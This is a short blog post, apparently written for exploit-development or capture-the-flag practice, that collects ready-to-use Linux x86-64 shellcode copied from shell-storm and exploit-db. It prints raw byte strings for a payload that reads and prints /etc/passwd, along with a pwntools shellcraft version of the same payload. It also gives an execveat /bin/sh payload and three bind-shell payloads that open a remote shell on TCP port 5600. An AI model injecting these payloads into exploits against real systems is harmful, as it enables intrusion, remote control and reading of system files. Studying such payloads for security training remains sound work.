
useful shellcode (linux x64)

by 즉흥 2023. 11. 4.

A collection of useful shellcode

 

Reference: https://shell-storm.org/shellcode/index.html

 


 

1. orw shellcode

Source: https://shell-storm.org/shellcode/files/shellcode-878.html

 

Linux/x86-64 - Read /etc/passwd - 82 bytes

 


# orw shellcode
sc="\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff"
sc+="/etc/passwdA"

 

 

2. orw shellcode using pwntools

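from pwn import *

context.arch = 'amd64'  # shellcraft/asm/disasm default to i386 unless this is set

# Alternative: push the path onto the stack, then open it via the stack pointer
#sc = shellcraft.pushstr(b'/etc/passwd')
#sc += shellcraft.open('rsp')

sc = shellcraft.open(b'/etc/passwd')        # open the file; the fd is returned in rax
sc += shellcraft.read('rax', 'rsp', 0x100)  # read up to 0x100 bytes from that fd onto the stack
sc += shellcraft.write(1, 'rsp', 0x100)     # write the buffer to stdout (fd 1)
print(sc)        # generated assembly source
sc = asm(sc)
print(len(sc))   # assembled length in bytes
print(disasm(sc))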

 

 

3. execveat

Source: ...

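from pwn import *

context.arch = 'amd64'  # disasm() assumes i386 unless the architecture is set

# execveat shellcode
# rax is set to 0x142 (322), the x86-64 execveat syscall number; 0x166 is the i386 number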
sc=b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
print(disasm(sc))

 

 

4. bind shell 5600

Source: https://www.exploit-db.com/exploits/41128

 


Linux/x64 - Bind (5600/TCP) Shell Shellcode (87 bytes) EDB-ID: 41128 CVE: N/A Date: 2017-01-19


sc="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

 

Source: https://www.exploit-db.com/exploits/39718

 


Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes) EDB-ID: 39718 CVE: N/A Date: 2016-04-21


sc="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"

 

Source: https://www.hackthesec.co.in/2016/04/linuxx8664-bindshell-port-5600-81-bytes.html

 

Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes Exploit


sc="\x99\x6a\x29\x58\x6a\x01\x5e\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x99\x52\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\x6a\x3b\x58\x0f\x05"

 

 
